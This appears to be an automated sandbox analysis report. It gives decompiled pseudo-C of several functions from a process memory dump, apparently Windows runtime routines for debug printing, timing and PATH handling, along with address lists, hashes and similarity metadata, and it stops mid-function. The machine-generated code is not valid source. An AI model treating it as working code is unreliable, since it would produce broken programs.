0x04ac529a
0x04ac529c
0x04ac529e
0x04ac529e
0x04ac52a4
0x04ac52b0
0x00000000
0x00000000
0x04ac52ba
0x04ac52bc
0x04ac52bc
0x04ac52d4
0x04ac52d9
0x04ac52dc
0x04ac52e1
0x00000000
0x00000000
0x04ac52e7
0x04ac52f4
0x00000000
0x04ac52f4
0x04ac5270
0x00000000
0x04ac5270
0x04ac51fc
0x04ac51fd
0x04ac5202
0x04ac5203
0x04ac5205
0x04ac520a
0x04ac520f
0x00000000
0x00000000
0x04ac521b
0x04ac5226
0x04ac522b
0x04ac521d
0x04ac521d
0x04ac5222
0x04ac5222
0x04ac522d
0x00000000

Strings

UEFI, xrefs: 04AC521D
Legacy, xrefs: 04AC5226

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 353af100212c414bfc303d3c635dbe71883414ea2eecb3e2716c765762e4bde8
Instruction ID: 9aa5738fce07e749a700e1210205538e50dc8984764995caf53b90ae1a5e2652
Opcode Fuzzy Hash: 353af100212c414bfc303d3c635dbe71883414ea2eecb3e2716c765762e4bde8
Instruction Fuzzy Hash: A2516DB1E00629AFDB64DFA8C990AAEB7F8FF48704F54402DE509EB251DA70F900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A4B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04A4B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4b1f7a8);
				E04A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04A9D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04A8D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04A8F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04A9DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04A8B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04A8B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04A8E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04A8A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x04a4b171
0x04a4b171
0x04a4b171
0x04a4b171
0x04a4b171
0x04a4b176
0x04a4b17b
0x04a4b180
0x04a4b186
0x04a4b18f
0x04a4b198
0x04a4b1a4
0x04a4b1aa
0x04aa4802
0x04aa4802
0x04aa4805
0x04aa480c
0x04aa480e
0x04a4b1d1
0x04a4b1d3
0x04a4b1de
0x04a4b1de
0x04aa4817
0x04aa481e
0x04aa4820
0x04aa4822
0x04aa4822
0x04aa4824
0x04aa4824
0x04aa482a
0x00000000
0x00000000
0x04aa4835
0x04aa483a
0x04aa483d
0x04aa483f
0x04aa4842
0x04aa4842
0x04aa4842
0x04aa4846
0x04aa484c
0x04aa484e
0x04aa4851
0x04aa4851
0x04aa4853
0x04aa4854
0x04aa4854
0x04aa4858
0x04aa485a
0x04aa485a
0x04aa485d
0x04aa485f
0x04aa4861
0x04aa4861
0x04aa4866
0x04aa486b
0x04aa486e
0x04aa4871
0x04aa4876
0x04aa4876
0x04aa4878
0x04aa487b
0x04aa4884
0x04aa4884
0x00000000
0x04aa487d
0x04aa487d
0x04aa4882
0x04aa4889
0x04aa4889
0x04aa488f
0x04aa4891
0x04aa48e0
0x04aa48e2
0x04aa48e4
0x04aa48e4
0x04aa48e7
0x04aa48e7
0x04aa48ed
0x04aa48f4
0x04aa48f6
0x04aa4951
0x04aa4951
0x04aa4953
0x04aa4953
0x04aa4956
0x04aa4956
0x04aa4958
0x04aa4959
0x04aa4959
0x04aa495d
0x04aa495d
0x04aa495f
0x04aa495f
0x04aa4965
0x04aa4969
0x04aa49ba
0x04aa49ba
0x04aa49c1
0x04aa49c5
0x04aa49cc
0x04aa49d4
0x04aa49d7
0x04aa49da
0x04aa49e4
0x04aa49e5
0x04aa49f3
0x04aa4a02
0x00000000
0x04aa4a02
0x04aa4972
0x04aa4974
0x00000000
0x00000000
0x04aa4976
0x04aa4979
0x04aa4982
0x04aa4983
0x04aa4984
0x04aa498b
0x04aa498d
0x04aa4991
0x04aa4993
0x04aa4999
0x04aa499d
0x04aa49a2
0x04aa49a2
0x04aa49a2
0x04aa4999
0x04aa49ac
0x00000000
0x04aa49b3
0x04aa48f8
0x04aa48fe
0x00000000
0x00000000
0x00000000
0x04aa48fe
0x04aa4895
0x04aa489c
0x04aa48ad
0x04aa48b2
0x04aa48b5
0x04aa48b7
0x04aa48ba
0x04aa48bc
0x04aa48c6
0x04aa48c6
0x04aa48cb
0x04aa48d1
0x04aa48d4
0x04aa48d8
0x04aa48d8
0x00000000
0x04aa48d8
0x04aa48be
0x04aa48c0
0x00000000
0x00000000
0x04aa48c2
0x00000000
0x00000000
0x00000000
0x04aa48c4
0x00000000
0x04aa4882
0x04aa487b
0x04aa4904
0x04aa4906
0x00000000
0x00000000
0x04aa4908
0x04aa490e
0x00000000
0x00000000
0x04aa4910
0x04aa4917
0x04aa4917
0x00000000
0x04aa4917
0x04a4b1ba
0x04aa47f9
0x04aa47fc
0x00000000
0x00000000
0x00000000
0x04aa47fc
0x04a4b1c0
0x04a4b1c0
0x04a4b1c3
0x04a4b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 04AA48AD

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: b4fc6b3033c932aa0d5ab141ab2d5459e9cdce3cc582b6f6433cb8711aefa8df
Instruction ID: 89d53e79dade28554bc1b5a416af74fe926b41695d5af67238b8771bee1aa42b
Opcode Fuzzy Hash: b4fc6b3033c932aa0d5ab141ab2d5459e9cdce3cc582b6f6433cb8711aefa8df
Instruction Fuzzy Hash: F751F171D002598EEF30CF68C941BAEBBB0EF48714F2041ADE859AB281D7B06965CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04A6B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04A6B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4b3d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04A67D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04B18CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04A89E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04A8B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04A8CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04A67D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04B18F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04A8AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4b38628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4b3862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4b38628; // 0x0
							_t116 =  *0x4b3862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x04a6b94c
0x04a6b956
0x04a6b95c
0x04a6b95e
0x04a6b964
0x04a6b969
0x04a6b96d
0x04a6b96d
0x04a6b970
0x04a6b974
0x04a6b97a
0x04a6badf
0x04a6badf
0x04a6bae2
0x04a6bae4
0x04a6bae6
0x04a6baf0
0x04ab2cb8
0x04a6baf6
0x04a6baf6
0x04a6baf6
0x04a6bafd
0x04a6bb1f
0x04a6bb1f
0x04a6baff
0x04a6bb00
0x04a6bb00
0x04a6bb03
0x04a6bb03
0x04a6bacb
0x04a6bacf
0x04a6bad0
0x04a6bad1
0x04a6badc
0x04a6badc
0x04a6b980
0x04a6b980
0x04a6b988
0x04a6b98b
0x04a6b98d
0x04a6b990
0x04a6b993
0x04a6b999
0x04a6b99b
0x04a6b9a1
0x04a6b9a5
0x04a6b9aa
0x04a6b9b0
0x04a6b9bb
0x04a6b9c0
0x04a6b9c3
0x04a6b9ca
0x04a6b9cc
0x04a6b9cf
0x04a6b9d3
0x04a6b9d7
0x04a6ba94
0x04a6ba94
0x04a6ba98
0x04a6baa3
0x04ab2ccb
0x04a6baa9
0x04a6baa9
0x04a6baa9
0x04a6bab1
0x04ab2cd5
0x04ab2cdd
0x04ab2cdd
0x04a6babb
0x04a6babc
0x04a6bac2
0x04a6bac3
0x04a6bac3
0x04a6bac6
0x00000000
0x04a6b9dd
0x04a6b9dd
0x04a6b9e7
0x04a6b9e7
0x04a6b9ec
0x04a6b9ec
0x04a6b9f1
0x04a6b9f5
0x04a6b9fa
0x04a6ba00
0x04a6ba0c
0x04a6ba10
0x04a6ba10
0x04a6ba12
0x04a6ba18
0x00000000
0x00000000
0x04a6bb26
0x04a6bb26
0x04a6ba1e
0x04a6ba1e
0x04a6ba23
0x04a6ba25
0x04a6ba2c
0x04a6ba30
0x04a6ba35
0x04a6ba35
0x04a6ba41
0x04a6ba46
0x04a6ba4c
0x04a6ba50
0x04a6ba54
0x04a6ba6a
0x04a6ba6e
0x04a6ba70
0x04a6ba74
0x04a6ba78
0x04a6ba7a
0x04a6ba7c
0x04a6ba8e
0x04a6ba90
0x04a6ba92
0x04a6bb14
0x04a6bb14
0x04a6bb16
0x04a6bb16
0x00000000
0x04a6ba7c
0x04a6bb0a
0x04a6bb0d
0x00000000
0x00000000
0x00000000
0x04a6bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A6B9A5

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: d87dc7e930bcf879e99dba94996bcaa22c995708f16a23f5928a312f6d6a1936
Instruction ID: 30b92ed2f82a7295b732dc6d389bc384a984279d542982a624965bccfcd530f0
Opcode Fuzzy Hash: d87dc7e930bcf879e99dba94996bcaa22c995708f16a23f5928a312f6d6a1936
Instruction Fuzzy Hash: FD513471A18350CFC720DF29C18092ABBF9FB98614F54896EE996C7355E731F844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A72581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E04A72581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t249;
				signed int _t256;
				signed int _t258;
				intOrPtr _t260;
				signed int _t263;
				signed int _t270;
				signed int _t273;
				signed int _t281;
				intOrPtr _t287;
				signed int _t289;
				signed int _t291;
				void* _t293;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				signed int _t303;
				signed int _t307;
				intOrPtr _t319;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				void* _t343;
				void* _t345;

				_t340 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x4b3d360 ^ _t340;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t335 = 0x4b3b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t345 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t287 = 0x48;
				_t317 = 0 | _t345 == 0x00000000;
				_t328 = 0;
				_v37 = _t345 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t287 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t336 = 0xc0000106;
						goto L32;
					} else {
						_t335 = L04A64620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t287);
						_v52 = _t335;
						__eflags = _t335;
						if(_t335 == 0) {
							_t336 = 0xc0000017;
							goto L32;
						} else {
							 *(_t335 + 0x44) =  *(_t335 + 0x44) & 0x00000000;
							_t50 = _t335 + 0x48; // 0x48
							_t330 = _t50;
							_t317 = _v32;
							 *((intOrPtr*)(_t335 + 0x3c)) = _t287;
							_t289 = 0;
							 *((short*)(_t335 + 0x30)) = _v48;
							__eflags = _t317;
							if(_t317 != 0) {
								 *(_t335 + 0x18) = _t330;
								__eflags = _t317 - 0x4b38478;
								 *_t335 = ((0 | _t317 == 0x04b38478) - 0x00000001 & 0xfffffffb) + 7;
								E04A8F3E0(_t330,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
								_t317 = _v32;
								_t343 = _t343 + 0xc;
								_t289 = 1;
								__eflags = _a8;
								_t330 = _t330 + (( *_t317 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t281 = E04AD39F2(_t330);
									_t317 = _v32;
									_t330 = _t281;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t336 = _v68;
								__eflags = 0;
								 *((short*)(_t330 - 2)) = 0;
								goto L32;
							} else {
								_t291 = _t335 + _t289 * 4;
								_v56 = _t291;
								do {
									__eflags = _t317;
									if(_t317 != 0) {
										_t237 =  *(_v60 + _t301 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t291 =  *(_v60 + _t301 * 4);
										 *(_t291 + 0x18) = _t330;
										_t241 =  *(_v60 + _t301 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M04A72959))) {
												case 0:
													__ax =  *0x4b38488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04A8F3E0(__edi,  *0x4b3848c, __ax & 0x0000ffff);
														__eax =  *0x4b38488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04A8F3E0(_t330, _v80, _v64);
													_t276 = _v64;
													goto L26;
												case 2:
													 *0x4b38480 & 0x0000ffff = E04A8F3E0(__edi,  *0x4b38484,  *0x4b38480 & 0x0000ffff);
													__eax =  *0x4b38480 & 0x0000ffff;
													__eax = ( *0x4b38480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04A8F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04A8F3E0(_t330, _v76, _v36);
														_t276 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t330 = _t330 + (_t276 >> 1) * 2 + 2;
													__eflags = _t330;
													L27:
													_push(0x3b);
													_pop(_t278);
													 *((short*)(_t330 - 2)) = _t278;
													goto L28;
												case 6:
													__ebx =  *0x4b3575c;
													__eflags = __ebx - 0x4b3575c;
													if(__ebx != 0x4b3575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04A8F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x4b3575c;
														} while (__ebx != 0x4b3575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4b38478 & 0x0000ffff = E04A8F3E0(__edi,  *0x4b3847c,  *0x4b38478 & 0x0000ffff);
													__eax =  *0x4b38478 & 0x0000ffff;
													__eax = ( *0x4b38478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04AD39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4b36e58 & 0x0000ffff = E04A8F3E0(__edi,  *0x4b36e5c,  *0x4b36e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4b36e58 & 0x0000ffff;
													__eax = ( *0x4b36e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t317 = _v32;
													L29:
													_t291 = _t291 + 4;
													__eflags = _t291;
													_v56 = _t291;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t328 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M04A72935))) {
							case 0:
								__ax =  *0x4b38488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t317 =  &_v64;
								_v80 = E04A72E3E(0,  &_v64);
								_t287 = _t287 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4b38480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4b38480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04A5EEF0(0x4b379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04A5EB70(__ecx, 0x4b379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t336;
												if(_t336 < 0) {
													L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
